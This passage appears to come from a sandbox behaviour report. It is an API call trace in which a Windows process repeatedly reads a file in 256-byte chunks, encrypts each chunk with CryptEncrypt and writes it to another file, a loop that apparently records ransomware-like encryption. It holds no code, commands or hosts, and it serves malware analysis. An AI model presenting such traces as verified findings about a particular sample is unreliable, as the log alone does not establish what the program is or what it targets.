pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.106] GetLastError () returned 0x0 [0167.106] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.106] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.106] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.106] GetLastError () returned 0x0 [0167.106] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.106] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.106] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.106] GetLastError () returned 0x0 [0167.106] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.106] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.106] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.106] GetLastError () returned 0x0 [0167.106] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.106] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.107] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.107] GetLastError () returned 0x0 [0167.107] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.107] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.107] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.107] GetLastError () returned 0x0 [0167.107] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.107] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.107] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.107] GetLastError () returned 0x0 [0167.107] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.107] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.107] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.107] GetLastError () returned 0x0 [0167.107] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.107] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.107] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.107] GetLastError () returned 0x0 [0167.107] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.107] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.107] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.107] GetLastError () returned 0x0 [0167.107] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.107] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.107] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.107] GetLastError () returned 0x0 [0167.107] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.108] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.108] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.108] GetLastError () returned 0x0 [0167.108] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.108] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.108] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.108] GetLastError () returned 0x0 [0167.108] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.108] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.108] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.108] GetLastError () returned 0x0 [0167.108] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.108] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.108] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.108] GetLastError () returned 0x0 [0167.108] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.108] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.108] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.108] GetLastError () returned 0x0 [0167.108] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.108] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.108] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.108] GetLastError () returned 0x0 [0167.108] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.108] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.108] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.109] GetLastError () returned 0x0 [0167.109] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.109] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.109] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.109] GetLastError () returned 0x0 [0167.109] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.109] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.109] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.109] GetLastError () returned 0x0 [0167.109] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.109] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.109] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.109] GetLastError () returned 0x0 [0167.109] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.109] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.109] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.109] GetLastError () returned 0x0 [0167.109] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.109] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.109] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.109] GetLastError () returned 0x0 [0167.109] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.109] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.109] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.109] GetLastError () returned 0x0 [0167.109] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.110] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.110] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.110] GetLastError () returned 0x0 [0167.110] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.110] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.110] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.110] GetLastError () returned 0x0 [0167.110] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.110] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.110] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.110] GetLastError () returned 0x0 [0167.110] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.110] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.110] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.110] GetLastError () returned 0x0 [0167.110] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.110] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.110] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.110] GetLastError () returned 0x0 [0167.110] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.110] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.110] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.110] GetLastError () returned 0x0 [0167.110] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.110] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.111] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.111] GetLastError () returned 0x0 [0167.111] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.111] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.111] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.111] GetLastError () returned 0x0 [0167.111] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.111] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.111] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.111] GetLastError () returned 0x0 [0167.111] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, 